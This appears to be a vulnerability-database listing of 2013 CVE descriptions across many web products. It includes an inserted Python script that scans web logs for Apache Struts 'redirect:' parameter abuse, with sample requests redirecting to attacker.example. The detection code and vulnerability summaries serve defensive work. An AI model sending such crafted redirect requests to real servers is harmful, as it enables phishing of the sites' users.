[CVE-2013-3026] Buffer overflow in the Lotus Quickr for Domino ActiveX control in qp2.cab in IBM Lotus Quickr 8.1 before FP 8.1.0.32-001a, 8.2 before FP 8.2.0.28-001a, and 8.5.1 before FP 8.5.1.39-002a for Domino allows remote attackers to execute arbitrary code via a crafted web site.
[CVE-2013-2994] IBM WebSphere Commerce 7.0 Feature Pack 4 and Feature Pack 5 incorrectly maintains a valid session after unspecified interaction with REST services, which allows remote attackers to issue REST requests in the context of an arbitrary user's active session via unknown vectors.
[CVE-2013-2993] IBM WebSphere Commerce 6.x through 6.0.0.11 and 7.x through 7.0.0.7 does not properly perform authentication for unspecified web services, which allows remote attackers to issue requests in the context of an arbitrary user's active session via unknown vectors.
[CVE-2013-2983] Multiple cross-site scripting (XSS) vulnerabilities in IBM Sterling File Gateway 2.2 and Sterling B2B Integrator allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2013-0468.
[CVE-2013-2981] Directory traversal vulnerability in the Web Console in IBM Data Studio 3.1.0 and 3.1.1 allows remote attackers to read arbitrary files via unspecified vectors.
[CVE-2013-2980] Cross-site request forgery (CSRF) vulnerability in the Web Console in IBM Data Studio 3.1.0 and 3.1.1 allows remote attackers to hijack the authentication of arbitrary users for requests that access monitored database information.
[CVE-2013-2969] Cross-site scripting (XSS) vulnerability in IBM Sterling Control Center (SCC) 5.2 before 5.2.0.9, 5.3 before 5.3.0.4, and 5.4 through 5.4.0.1 allows remote authenticated users to inject arbitrary web script or HTML via vectors involving invalid characters.
[CVE-2013-2961] The internal web server in the Basic Services component in IBM Tivoli Monitoring (ITM) 6.2.0 through FP3, 6.2.1 through FP4, 6.2.2 through FP9, and 6.2.3 before FP3, as used in IBM Application Manager for Smart Business (formerly Tivoli Foundations Application Manager) 1.2.1 before 1.2.1.0-TIV-IAMSB-FP0004 and other products, allows remote attackers to perform unspecified redirection of HTTP requests, and bypass the proxy-server configuration, via crafted HTTP traffic.
[CVE-2013-2957] Cross-site scripting (XSS) vulnerability in IBM InfoSphere Optim Data Growth for Oracle E-Business Suite 6.x, 7.x, and 9.x before 9.1.0.3 allows remote authenticated users to inject arbitrary web script or HTML via a crafted URL.
[CVE-2013-2955] Cross-site scripting (XSS) vulnerability in IBM InfoSphere Optim Data Growth for Oracle E-Business Suite 6.x, 7.x, and 9.x before 9.1.0.3 allows remote authenticated users to inject arbitrary web script or HTML via a crafted URL, related to a stored XSS issue.
[CVE-2013-2950] CRLF injection vulnerability in IBM WebSphere Portal 6.1.0.x before 6.1.0.3 CF26, 6.1.5.x before 6.1.5 CF26, 7.0.0.x before 7.0.0.2 CF21, and 8.0.0.x through 8.0.0.1 CF5, when home substitution (aka uri.home.substitution) is enabled, allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via unspecified vectors.
[CVE-2013-2881] Google Chrome before 28.0.1500.95 does not properly handle frames, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.
[CVE-2013-2879] Google Chrome before 28.0.1500.71 does not properly determine the circumstances in which a renderer process can be considered a trusted process for sign-in and subsequent sync operations, which makes it easier for remote attackers to conduct phishing attacks via a crafted web site.
[CVE-2013-2867] Google Chrome before 28.0.1500.71 does not properly prevent pop-under windows, which allows remote attackers to have an unspecified impact via a crafted web site.
[CVE-2013-2849] Multiple cross-site scripting (XSS) vulnerabilities in Google Chrome before 27.0.1453.93 allow user-assisted remote attackers to inject arbitrary web script or HTML via vectors involving a (1) drag-and-drop or (2) copy-and-paste operation.
[CVE-2013-2845] The Web Audio implementation in Google Chrome before 27.0.1453.93 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
[CVE-2013-2835] Google Chrome OS before 26.0.1410.57 does not properly enforce origin restrictions for the O3D and Google Talk plug-ins, which allows remote attackers to bypass the domain-whitelist protection mechanism via a crafted web site, a different vulnerability than CVE-2013-2834.
[CVE-2013-2834] Google Chrome OS before 26.0.1410.57 does not properly enforce origin restrictions for the O3D and Google Talk plug-ins, which allows remote attackers to bypass the domain-whitelist protection mechanism via a crafted web site, a different vulnerability than CVE-2013-2835.
[CVE-2013-2785] Multiple buffer overflows in CimWebServer.exe in the WebView component in GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY before 8.0 SIM 27, 8.1 before SIM 25, and 8.2 before SIM 19, and Proficy Process Systems with CIMPLICITY, allow remote attackers to execute arbitrary code via crafted data in packets to TCP port 10212, aka ZDI-CAN-1621 and ZDI-CAN-1624.
[CVE-2013-2766] Cross-site scripting (XSS) vulnerability in Splunk Web in Splunk 4.3.0 through 4.3.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-2715] Cross-site scripting (XSS) vulnerability in the admin view in the Search API (search_api) module 7.x-1.x before 7.x-1.4 for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via a crafted field name.
[CVE-2013-2696] Cross-site request forgery (CSRF) vulnerability in the All in One Webmaster plugin before 8.2.4 for WordPress allows remote attackers to hijack the authentication of arbitrary users for requests that insert XSS sequences.
[CVE-2013-2690] SQL injection vulnerability in index.php in Synchroweb Technology SynConnect 2.0 allows remote attackers to execute arbitrary SQL commands via the loginid parameter in a logoff action.
[CVE-2013-2630] Cross-site scripting (XSS) vulnerability in CA Service Desk Manager 12.5 through 12.7 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2013-2551] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1308 and CVE-2013-1309.
[CVE-2013-2501] Cross-site scripting (XSS) vulnerability in the Terillion Reviews plugin before 1.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ProfileId field.
[CVE-2013-2413] Unspecified vulnerability in the Siebel Enterprise Application Integration component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Web Services.
[CVE-2013-2411] Unspecified vulnerability in the Primavera P6 Enterprise Project Portfolio Management component in Oracle Primavera Products Suite 7.0, 8.1, and 8.2 allows remote attackers to affect integrity via unknown vectors related to Web Access.
[CVE-2013-2405] Unspecified vulnerability in the Primavera P6 Enterprise Project Portfolio Management component in Oracle Primavera Products Suite 7.0, 8.1, and 8.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Web Access.
[CVE-2013-2403] Unspecified vulnerability in the Siebel Enterprise Application Integration component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Web Services, a different vulnerability than CVE-2013-0416.
[CVE-2013-2390] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2, 10.3.5, 10.3.6, and 12.1.1 allows remote attackers to affect integrity via unknown vectors related to WebLogic Console, a different vulnerability than CVE-2013-1504.
[CVE-2013-2373] The Engine in TIBCO Spotfire Web Player 3.3.x before 3.3.3, 4.0.x before 4.0.3, 4.5.x before 4.5.1, and 5.0.x before 5.0.1 does not properly implement access control, which allows remote attackers to obtain sensitive information or modify data via unspecified vectors.
[CVE-2013-2372] Cross-site scripting (XSS) vulnerability in the Engine in TIBCO Spotfire Web Player 3.3.x before 3.3.3, 4.0.x before 4.0.3, 4.5.x before 4.5.1, and 5.0.x before 5.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-2371] The Web API in the Statistics Server in TIBCO Spotfire Statistics Services 3.3.x before 3.3.1, 4.5.x before 4.5.1, and 5.0.x before 5.0.1 allows remote attackers to obtain sensitive information via an unspecified HTTP request.
[CVE-2013-2364] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) before 7.2.1 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-2361] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) before 7.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-2337] Cross-site scripting (XSS) vulnerability in HP Service Manager 7.11, 9.21, 9.30, and 9.31, and ServiceCenter 6.2.8, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-2321] Cross-site scripting (XSS) vulnerability in HP Service Manager Web Tier 9.31 before 9.31.2004 p2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-2314] Cross-site scripting (XSS) vulnerability in the adminAuthorization function in data/class/helper/SC_Helper_Session.php in LOCKON EC-CUBE 2.11.0 through 2.12.3enP2 allows remote attackers to inject arbitrary web script or HTML via a crafted URL associated with the management screen.
[CVE-2013-2313] Session fixation vulnerability in LOCKON EC-CUBE 2.11.0 through 2.12.3enP2 allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2013-2312] Cross-site scripting (XSS) vulnerability in the shopping-cart screen in LOCKON EC-CUBE 2.11.0 through 2.12.3enP2 allows remote attackers to inject arbitrary web script or HTML via a crafted URL.
[CVE-2013-2311] Cross-site scripting (XSS) vulnerability in static/js/share.js (aka the social bookmarking widget) in Web2py before 2.3.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-2309] Cross-site scripting (XSS) vulnerability in the management screen in OpenPNE 3.4.x before 3.4.21.1, 3.6.x before 3.6.9.1, and 3.8.x before 3.8.5.1 allows remote attackers to inject arbitrary web script or HTML via vectors involving the "mobile version color scheme."
[CVE-2013-2307] The Yahoo! Browser application before 1.4.3 for Android allows remote attackers to spoof the address bar via a crafted web site.
[CVE-2013-2306] The jigbrowser+ application before 1.6.4 for Android does not properly open windows, which allows remote attackers to spoof the address bar via a crafted web site.
[CVE-2013-2304] The Sleipnir Mobile application 2.8.0 and earlier and Sleipnir Mobile Black Edition application 2.8.0 and earlier for Android allow remote attackers to load arbitrary Extension APIs, and trigger downloads or obtain sensitive HTTP response-body information, via a crafted web page.
[CVE-2013-2302] TransWARE Active! mail 6, when an external public interface is used, allows local users to obtain sensitive information belonging to arbitrary users by leveraging shell access, as demonstrated by a TELNET or SSH session to the server.
[CVE-2013-2290] Cross-site scripting (XSS) vulnerability in the dashboard of the ArubaOS Administration WebUI in Aruba Networks ArubaOS 6.2.x before 6.2.0.3, 6.1.3.x before 6.1.3.7, 6.1.x-FIPS before 6.1.4.3-FIPS, and 6.1.x-AirGroup before 6.1.3.6-AirGroup, as used by Mobility Controller, allows remote wireless access points to inject arbitrary web script or HTML via a crafted SSID.
[CVE-2013-2268] Unspecified vulnerability in the MathML implementation in WebKit in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, has unknown impact and remote attack vectors, related to a "high severity security issue."
[CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
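The Struts entry above names the two parameter prefixes an attacker uses but gives no way to spot them in traffic. The following is an added example, not code from the vulscan database or the Struts project: a log-scanning check that flags requests whose query string carries a parameter *name* beginning with `redirect:` or `redirectAction:` (in Struts 2 the prefix is the parameter name and the target follows it, which is the assumption this check rests on) and records whether the target points off-site. The access-log lines are constructed for the example, the host names are reserved documentation names, and the function names are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Prefixes Struts 2 treats as navigation directives when they start a
# request parameter name (assumption stated in the lead-in).
REDIRECT_PREFIXES = ("redirect:", "redirectAction:")

# Request-line extractor for common/combined access-log format.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jul/2013:12:01:02 +0000] '
    '"GET /app/index.action?redirect:http://attacker.example/ HTTP/1.1" 302 0',
    '198.51.100.4 - - [10/Jul/2013:12:01:09 +0000] '
    '"GET /app/index.action?foo=bar HTTP/1.1" 200 512',
    '192.0.2.9 - - [10/Jul/2013:12:02:11 +0000] '
    '"GET /app/login.action?redirectAction:foo HTTP/1.1" 302 0',
    '203.0.113.7 - - [10/Jul/2013:12:03:40 +0000] '
    '"GET /app/index.action?redirect%3A//attacker.example/x HTTP/1.1" 302 0',
]


def struts_redirect_params(url):
    """Return (kind, target) pairs for every redirect:/redirectAction:
    parameter name in the query string of `url`. Percent-encoding is
    decoded by parse_qsl, so `redirect%3A...` is caught as well."""
    query = urlsplit(url).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        for prefix in REDIRECT_PREFIXES:
            if name.startswith(prefix):
                target = name[len(prefix):]
                # A target containing '=' is split by parse_qsl; rejoin it.
                if value:
                    target += "=" + value
                hits.append((prefix[:-1], target))
    return hits


def is_external(target):
    """True when the target carries a scheme or is protocol-relative,
    i.e. the redirect can leave the application's own host."""
    parts = urlsplit(target)
    return bool(parts.scheme) or target.startswith("//")


def scan_access_log(lines):
    """Scan access-log lines and return one finding per prefixed parameter."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        for kind, target in struts_redirect_params(m.group(1)):
            findings.append({
                "client": client,
                "kind": kind,
                "target": target,
                "external": is_external(target),
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        flag = "EXTERNAL" if f["external"] else "local"
        print(f"{f['client']}\t{f['kind']}\t{flag}\t{f['target']}")
```

Internal targets are reported too, because a local `redirectAction:` still lets a caller pick the action that runs next; only the `external` flag separates the phishing case the CVE describes from an in-application hop.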
[CVE-2013-2244] Multiple cross-site scripting (XSS) vulnerabilities in lib/conditionlib.php in Moodle 2.4.x before 2.4.5 and 2.5.x before 2.5.1 allow remote attackers to inject arbitrary web script or HTML via the conditional access rule value of a user field.
[CVE-2013-2237] The key_notify_policy_flush function in net/key/af_key.c in the Linux kernel before 3.9 does not initialize a certain structure member, which allows local users to obtain sensitive information from kernel heap memory by reading a broadcast message from the notify_policy interface of an IPSec key_socket.
[CVE-2013-2234] The (1) key_notify_sa_flush and (2) key_notify_policy_flush functions in net/key/af_key.c in the Linux kernel before 3.10 do not initialize certain structure members, which allows local users to obtain sensitive information from kernel heap memory by reading a broadcast message from the notify interface of an IPSec key_socket.
[CVE-2013-2232] The ip6_sk_dst_check function in net/ipv6/ip6_output.c in the Linux kernel before 3.10 allows local users to cause a denial of service (system crash) by using an AF_INET6 socket for a connection to an IPv4 interface.
[CVE-2013-2209] Cross-site scripting (XSS) vulnerability in the auto-complete widget in htdocs/media/rb/js/reviews.js in Review Board 1.6.x before 1.6.17 and 1.7.x before 1.7.10 allows remote attackers to inject arbitrary web script or HTML via a full name.
[CVE-2013-2205] The default configuration of SWFUpload in WordPress before 3.5.2 has an unrestrictive security.allowDomain setting, which allows remote attackers to bypass the Same Origin Policy and conduct cross-site scripting (XSS) attacks via a crafted web site.
[CVE-2013-2201] Multiple cross-site scripting (XSS) vulnerabilities in WordPress before 3.5.2 allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) uploads of media files, (2) editing of media files, (3) installation of plugins, (4) updates to plugins, (5) installation of themes, or (6) updates to themes.
[CVE-2013-2181] Cross-site scripting (XSS) vulnerability in the Directory Listing plugin in Monkey HTTP Daemon (monkeyd) 1.2.2 allows attackers to inject arbitrary web script or HTML via a file name.
[CVE-2013-2177] Cross-site scripting (XSS) vulnerability in the Display Suite module 7.x-1.x before 7.x-1.7 and 7.x-2.x before 7.x-2.3 for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via an entity bundle label.
[CVE-2013-2165] ResourceBuilderImpl.java in the RichFaces 3.x through 5.x implementation in Red Hat JBoss Web Framework Kit before 2.3.0, Red Hat JBoss Web Platform through 5.2.0, Red Hat JBoss Enterprise Application Platform through 4.3.0 CP10 and 5.x through 5.2.0, Red Hat JBoss BRMS through 5.3.1, Red Hat JBoss SOA Platform through 4.3.0 CP05 and 5.x through 5.3.1, Red Hat JBoss Portal through 4.3 CP07 and 5.x through 5.2.2, and Red Hat JBoss Operations Network through 2.4.2 and 3.x through 3.1.2 does not restrict the classes for which deserialization methods can be called, which allows remote attackers to execute arbitrary code via crafted serialized data.
[CVE-2013-2129] Cross-site scripting (XSS) vulnerability in the Webform module 6.x-3.x before 6.x-3.19 for Drupal allows remote authenticated users with the "edit own webform content" or "edit all webform content" permissions to inject arbitrary web script or HTML via a component label.
[CVE-2013-2036] Cross-site scripting (XSS) vulnerability in the Filebrowser module 6.x-2.x before 6.x-2.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to "lists of files."
[CVE-2013-1976] The (1) tomcat5, (2) tomcat6, and (3) tomcat7 init scripts, as used in the RPM distribution of Tomcat for JBoss Enterprise Web Server 1.0.2 and 2.0.0, and Red Hat Enterprise Linux 5 and 6, allow local users to change the ownership of arbitrary files via a symlink attack on (a) tomcat5-initd.log, (b) tomcat6-initd.log, (c) catalina.out, or (d) tomcat7-initd.log.
[CVE-2013-1971] Cross-site scripting (XSS) vulnerability in the MP3 Player module for Drupal 6.x allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via the file name of a MP3 file.
[CVE-2013-1955] Multiple cross-site scripting (XSS) vulnerabilities in (1) index.php and (2) datePicker.php in Easy PHP Calendar 6.x and 7.x before 7.0.13 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-1937] Multiple cross-site scripting (XSS) vulnerabilities in tbl_gis_visualization.php in phpMyAdmin 3.5.x before 3.5.8 might allow remote attackers to inject arbitrary web script or HTML via the (1) visualizationSettings[width] or (2) visualizationSettings[height] parameter.
[CVE-2013-1927] The IcedTea-Web plugin before 1.2.3 and 1.3.x before 1.3.2 allows remote attackers to execute arbitrary code via a crafted file that validates as both a GIF and a Java JAR file, aka "GIFAR."
[CVE-2013-1926] The IcedTea-Web plugin before 1.2.3 and 1.3.x before 1.3.2 uses the same class loader for applets with the same codebase path but from different domains, which allows remote attackers to obtain sensitive information or possibly alter other applets via a crafted applet.
[CVE-2013-1906] Cross-site scripting (XSS) vulnerability in the Rules module 7.x-2.x before 7.x-2.3 for Drupal allows remote authenticated users with the "administer rules" permission to inject arbitrary web script or HTML via a rule tag.
[CVE-2013-1905] Cross-site scripting (XSS) vulnerability in the Zero Point theme 7.x-1.x before 7.x-1.9 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-1887] Multiple cross-site scripting (XSS) vulnerabilities in the Views module 7.x-3.x before 7.x-3.6 for Drupal allow remote authenticated users with certain permissions to inject arbitrary web script or HTML via certain view configuration fields.
[CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
[CVE-2013-1844] Cross-site scripting (XSS) vulnerability in Piwik before 1.11 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-1843] Open redirect vulnerability in the Access tracking mechanism in TYPO3 4.5.x before 4.5.24, 4.6.x before 4.6.17, 4.7.x before 4.7.9, and 6.0.x before 6.0.3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2013-1836] Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 does not properly manage privileges for WebDAV repositories, which allows remote authenticated users to read, modify, or delete arbitrary site-wide repositories by leveraging certain read access.
[CVE-2013-1833] Multiple cross-site scripting (XSS) vulnerabilities in the File Picker module in Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 allow remote authenticated users to inject arbitrary web script or HTML via a crafted filename.
[CVE-2013-1832] repository/webdav/lib.php in Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 includes the WebDAV password in the configuration form, which allows remote authenticated administrators to obtain sensitive information by configuring an instance.
[CVE-2013-1823] Cross-site scripting (XSS) vulnerability in the Notifications form in Red Hat Subscription Asset Manager before 1.2.1 allows remote attackers to inject arbitrary web script or HTML via the username field.
[CVE-2013-1808] Cross-site scripting (XSS) vulnerability in ZeroClipboard.swf and ZeroClipboard10.swf in ZeroClipboard before 1.0.8, as used in em-shorty, RepRapCalculator, Fulcrum, Django, aCMS, and other products, allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: this might be the same vulnerability as CVE-2013-1463. If so, it is likely that CVE-2013-1463 will be REJECTed.
[CVE-2013-1787] Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the Simple Corporate theme before 7.x-1.4 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-1786] Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the Company theme before 7.x-1.4 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-1785] Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the Premium Responsive theme before 7.x-1.6 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-1784] Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the Clean Theme before 7.x-1.3 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-1783] Cross-site scripting (XSS) vulnerability in the 3 slide gallery in page--front.tpl.php in the Business theme before 7.x-1.8 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-1782] Cross-site scripting (XSS) vulnerability in the Responsive Blog Theme 7.x-1.x before 7.x-1.6 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via vectors related to social icons.
[CVE-2013-1781] Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the Professional theme before 7.x-1.4 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-1780] Cross-site scripting (XSS) vulnerability in the Best Responsive Theme 7.x-1.x before 7.x-1.1 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via vectors related to social icons.
[CVE-2013-1779] Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the Fresh theme before 7.x-1.4 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-1778] Cross-site scripting (XSS) vulnerability in the Creative Theme 7.x-1.x before 7.x-1.2 for Drupal allows remote authenticated users with the administer themes permission to inject arbitrary web script or HTML via vectors related to social icons.
[CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
[CVE-2013-1749] Cross-site scripting (XSS) vulnerability in edit.php in PHP Address Book 8.2.5 allows user-assisted remote attackers to inject arbitrary web script or HTML via the Address field.
[CVE-2013-1714] The Web Workers implementation in Mozilla Firefox before 23.0, Firefox ESR 17.x before 17.0.8, Thunderbird before 17.0.8, Thunderbird ESR 17.x before 17.0.8, and SeaMonkey before 2.20 does not properly restrict XMLHttpRequest calls, which allows remote attackers to bypass the Same Origin Policy and conduct cross-site scripting (XSS) attacks via unspecified vectors.
[CVE-2013-1713] Mozilla Firefox before 23.0, Firefox ESR 17.x before 17.0.8, Thunderbird before 17.0.8, Thunderbird ESR 17.x before 17.0.8, and SeaMonkey before 2.20 use an incorrect URI within unspecified comparisons during enforcement of the Same Origin Policy, which allows remote attackers to conduct cross-site scripting (XSS) attacks or install arbitrary add-ons via a crafted web site.
[CVE-2013-1698] The getUserMedia permission implementation in Mozilla Firefox before 22.0 references the URL of a top-level document instead of the URL of a specific page, which makes it easier for remote attackers to trick users into permitting camera or microphone access via a crafted web site that uses IFRAME elements.
[CVE-2013-1697] The XrayWrapper implementation in Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 does not properly restrict use of DefaultValue for method calls, which allows remote attackers to execute arbitrary JavaScript code with chrome privileges via a crafted web site that triggers use of a user-defined (1) toString or (2) valueOf method.
[CVE-2013-1696] Mozilla Firefox before 22.0 does not properly enforce the X-Frame-Options protection mechanism, which allows remote attackers to conduct clickjacking attacks via a crafted web site that uses the HTTP server push feature with multipart responses.
[CVE-2013-1692] Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 do not prevent the inclusion of body data in an XMLHttpRequest HEAD request, which makes it easier for remote attackers to conduct cross-site request forgery (CSRF) attacks via a crafted web site.
[CVE-2013-1690] Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 do not properly handle onreadystatechange events in conjunction with page reloading, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted web site that triggers an attempt to execute data at an unmapped memory location.
[CVE-2013-1688] The Profiler implementation in Mozilla Firefox before 22.0 parses untrusted data during UI rendering, which allows user-assisted remote attackers to execute arbitrary JavaScript code via a crafted web site.
[CVE-2013-1687] The System Only Wrapper (SOW) and Chrome Object Wrapper (COW) implementations in Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 do not properly restrict XBL user-defined functions, which allows remote attackers to execute arbitrary JavaScript code with chrome privileges, or conduct cross-site scripting (XSS) attacks, via a crafted web site.
[CVE-2013-1685] Use-after-free vulnerability in the nsIDocument::GetRootElement function in Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted web site.
[CVE-2013-1684] Use-after-free vulnerability in the mozilla::dom::HTMLMediaElement::LookupMediaElementURITable function in Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbird before 17.0.7, and Thunderbird ESR 17.x before 17.0.7 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted web site.
[CVE-2013-1675] Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 do not properly initialize data structures for the nsDOMSVGZoomEvent::mPreviousScale and nsDOMSVGZoomEvent::mNewScale functions, which allows remote attackers to obtain sensitive information from process memory via a crafted web site.
[CVE-2013-1671] Mozilla Firefox before 21.0 does not properly implement the INPUT element, which allows remote attackers to obtain the full pathname via a crafted web site.
[CVE-2013-1670] The Chrome Object Wrapper (COW) implementation in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 does not prevent acquisition of chrome privileges during calls to content level constructors, which allows remote attackers to bypass certain read-only restrictions and conduct cross-site scripting (XSS) attacks via a crafted web site.
[CVE-2013-1639] Opera before 12.13 does not send CORS preflight requests in all required cases, which allows remote attackers to bypass a CSRF protection mechanism via a crafted web site that triggers a CORS request.
[CVE-2013-1627] Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.
[CVE-2013-1617] Multiple SQL injection vulnerabilities in the management console on the Symantec Web Gateway (SWG) appliance before 5.1.1 allow remote authenticated administrators to execute arbitrary SQL commands via unspecified vectors.
[CVE-2013-1616] The management console on the Symantec Web Gateway (SWG) appliance before 5.1.1 allows remote attackers to execute arbitrary commands by injecting a command into an application script.
[CVE-2013-1615] The management console (aka Java console) on the Symantec Security Information Manager (SSIM) appliance 4.7.x and 4.8.x before 4.8.1 allows remote attackers to obtain sensitive information via unspecified web-GUI API calls.
[CVE-2013-1614] Multiple cross-site scripting (XSS) vulnerabilities in the management console (aka Java console) on the Symantec Security Information Manager (SSIM) appliance 4.7.x and 4.8.x before 4.8.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-1559] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1 and 11.1.1.6.0 allows remote authenticated users to affect availability via unknown vectors related to Content Server.
[CVE-2013-1553] Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.
[CVE-2013-1545] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 10.1.3.5, 11.1.1.5.0, and 11.1.1.6.0 allows remote attackers to affect availability via unknown vectors related to Web Listener.
[CVE-2013-1529] Unspecified vulnerability in the Oracle WebCenter Interaction component in Oracle Fusion Middleware 6.5.1 and 10.3.3.0 allows remote attackers to affect integrity via unknown vectors related to Image Service.
[CVE-2013-1522] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1 and 11.1.1.6.0 allows remote attackers to affect integrity via unknown vectors related to Content Server.
[CVE-2013-1516] Unspecified vulnerability in the Oracle WebCenter Capture component in Oracle Fusion Middleware 10.1.3.5.1 allows remote authenticated users to affect availability via unknown vectors related to Import Server.
[CVE-2013-1515] Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Sun Middleware Products 3.0.1 and 3.1.2 allows remote attackers to affect integrity via vectors related to ADMIN Interface.
